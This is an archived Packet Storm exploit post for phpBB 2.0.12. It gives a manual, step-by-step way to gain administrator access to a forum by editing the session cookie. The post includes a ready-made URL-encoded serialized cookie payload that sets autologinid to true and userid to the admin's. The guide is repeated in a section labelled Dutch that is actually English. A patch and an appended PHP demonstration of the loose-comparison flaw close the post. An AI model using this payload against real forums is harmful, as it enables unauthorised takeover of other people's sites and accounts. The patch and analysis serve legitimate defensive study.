phpBB2012session.txt

12 Mar 2005 00:00:00 | Reported by PPC | Type: packetstorm | Source: packetstormsecurity.com

phpBB 2.0.12 has a critical session-handling flaw that allows administrator authentication bypass; an update to 2.0.13 is required.

Code
`  
  
-----------------------------------  
  
phpBB 2.0.12 Session Handling  
Administrator Authentication  
Bypass EXPLOIT -SIMPLIFIED-  
- By PPC^Rebyte  
  
-----------------------------------  
  
03 Mar 2005  
  
** DUTCH VERSION BELOW **  
  
[ ENGLISH VERSION ]  
  
*** Status  
__________  
  
phpBB has already been informed about this exploit and released a  
'critical update' on 27 February 2005; however, most forums are still running  
version 2.0.12 or lower.  
  
VULNERABLE:  
- 2.0.x --> 2.0.12  
  
IMMUNE:  
- 2.0.13 or newer  
  
  
1* Intro  
________  
  
The discoverer of this bug is unknown, according to "Paisterist", who wrote a  
C exploit for this bug.  
  
Link to Paisterist's exploit at Packetstormsecurity:  
http://packetstormsecurity.org/0503-exploits/phpbbsession.c  
  
This program didn't work as it should on my PC, so I had to find a way  
to exploit the bug manually myself.  
This seemed to be much easier than compiling that C exploit and fooling around  
with it until it eventually still doesn't work (in my case).  
This simplified manual method I'll describe can also be used for Internet  
Explorer or other browsers instead of only Mozilla/Firefox.  
  
  
2* The bug  
__________  
  
We're going to edit a cookie so that when you visit a certain forum another  
time you will get logged in having admin rights. This is possible due to a  
bug in includes/sessions.php  
--> if( $sessiondata['autologinid'] == $auto_login_key )  
  
  
3* Preparation  
______________  
  
1. Register at forum?  
  
2. Log in with account  
+ UNCHECK "Log in automatically"  
  
3. Close browser to be sure a cookie is made.  
  
4. Locate cookie  
*firefox: X:\Documents and Settings\Name\Application  
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt  
--> search the .txt for the domainname (domain.tld)  
--> default cookiename = phpbbmysql  
*iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]  
--> default cookiename = phpbbmysql  
  
4* Let's Xploit!  
________________  
  
Open the cookie in a text editor and search for a line that resembles:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D  
  
|  
[ your 'user id' ] ____|  
  
Replace this with:  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D  
  
|  
[ 2 = 'user id' of admin ] ____|  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
Save cookie and close.  
Open your browser and surf to forum.  
  
You'll now be automatically logged in with admin rights :)  
  
  
5* Solution  
___________  
  
* Update phpBB to version 2.0.13  
  
- or -  
  
* in "includes/sessions.php" replace code:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
if( $sessiondata['autologinid'] == $auto_login_key )  
  
replace with:  
  
if( $sessiondata['autologinid'] === $auto_login_key )  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
  
6* Outro  
________  
  
THE.END  
  
Greetings 2 everyone at Rebyte and the whole Belgian scene !!  
Additional greetings 2 Paisterist for the original C exploit !  
  
-- PPC^Rebyte --  
-- [email protected] --  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
[ DUTCH VERSION ]  
  
*** Status  
__________  
  
phpBB has been informed about this exploit and released a 'critical update'  
on 27 February, but most forums are still running  
version 2.0.12 or lower.  
  
VULNERABLE:  
- 2.0.x up to 2.0.12  
  
IMMUNE:  
- 2.0.13 or newer  
  
  
1* Intro  
________  
  
The discoverer of the bug is unknown, reports "Paisterist", who wrote a  
C exploit for this bug.  
  
Link to Paisterist's exploit at Packetstormsecurity:  
http://packetstormsecurity.org/0503-exploits/phpbbsession.c  
  
This program did not work at all on my PC, so I looked for a way myself,  
using the exploit, to exploit the bug manually.  
This was actually much faster than having to compile the C exploit  
and fiddle around with it while in the end it does not work properly  
(in my case).  
The simplified manual method I describe can also be used  
for Internet Explorer or other browsers instead of only Firefox.  
  
  
2* How it works  
_______________  
  
We are going to modify a cookie so that when you visit a certain forum again  
you are logged in with admin rights, through a bug in sessions.php  
--> if( $sessiondata['autologinid'] == $auto_login_key )  
  
3* Preparation  
______________  
  
1. Register at the forum if needed  
  
2. Log in with account  
+ UNCHECK Log in automatically  
  
3. Close the browser so that a cookie is definitely created  
  
4. Locate cookie  
*for firefox: X:\Documents and Settings\Name\Application  
Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt  
--> search the .txt for the domain name (domain.tld)  
--> default cookie name = phpbbmysql  
*for iexplorer: X:\Documents and Settings\Name\Cookies\[email protected]  
--> default cookie name = phpbbmysql  
  
4* Let's Xploit!  
________________  
  
Open the cookie in a text editor and look for a line that resembles:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D  
  
|  
[ your 'user id' ] ____|  
  
Replace this with:  
  
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B  
s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D  
  
|  
[ 2 = 'user id' of admin ] ____|  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
Save the cookie and close.  
Open the browser and surf to the forum.  
  
Normally you are now logged in with admin rights :)  
  
  
5* Solution  
___________  
  
* Update phpBB to 2.0.13  
  
- or -  
  
* in includes/sessions.php replace code:  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
if( $sessiondata['autologinid'] == $auto_login_key )  
  
replace with:  
  
if( $sessiondata['autologinid'] === $auto_login_key )  
  
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  
  
  
6* Outro  
________  
  
THE.END  
  
Greetings 2 everyone at Rebyte and the whole Belgian scene !!  
Additional greetings 2 Paisterist for the original C exploit !  
  
-- PPC^Rebyte --  
-- [email protected] --  
`
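
Why the one-character fix in section 5 matters: the sketch below runs the advisory's `==` comparison, the `===` replacement and a further-hardened check against the modified cookie value quoted above. It is an added example, not phpBB code or part of the original advisory; the function names, `$storedKey` and its value are hypothetical, and it assumes PHP 7.0 or later.

```php
<?php
declare(strict_types=1);

// Added example; not phpBB code. Function names and $storedKey are hypothetical.

// Cookie value in the modified form quoted in the advisory (both lines joined).
$rawCookie = 'a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B'
           . 's%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D';

// Constructed stand-in for the auto-login key the server holds for the user.
$storedKey = str_repeat('a', 32);

// Same operator as the vulnerable line. When one operand is a boolean, PHP
// converts the other to boolean too, and any non-empty string other than "0"
// converts to true, so the key's actual value is never examined.
function matchesLoose(array $sessiondata, string $key): bool
{
    return $sessiondata['autologinid'] == $key;
}

// The 2.0.13 change: === requires the same type as well as the same value.
function matchesStrict(array $sessiondata, string $key): bool
{
    return $sessiondata['autologinid'] === $key;
}

// Further hardening (an assumption, not part of the phpBB fix): reject
// non-string or empty values up front and compare in constant time.
function matchesHardened(array $sessiondata, string $key): bool
{
    $candidate = $sessiondata['autologinid'] ?? null;
    return is_string($candidate) && $candidate !== '' && hash_equals($key, $candidate);
}

// allowed_classes => false stops unserialize() from instantiating objects.
$sessiondata = unserialize(urldecode($rawCookie), ['allowed_classes' => false]);
if (!is_array($sessiondata)) {
    exit("cookie did not decode to an array\n");
}

foreach (['matchesLoose', 'matchesStrict', 'matchesHardened'] as $check) {
    printf("%-16s %s\n", $check, var_export($check($sessiondata, $storedKey), true));
}
```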
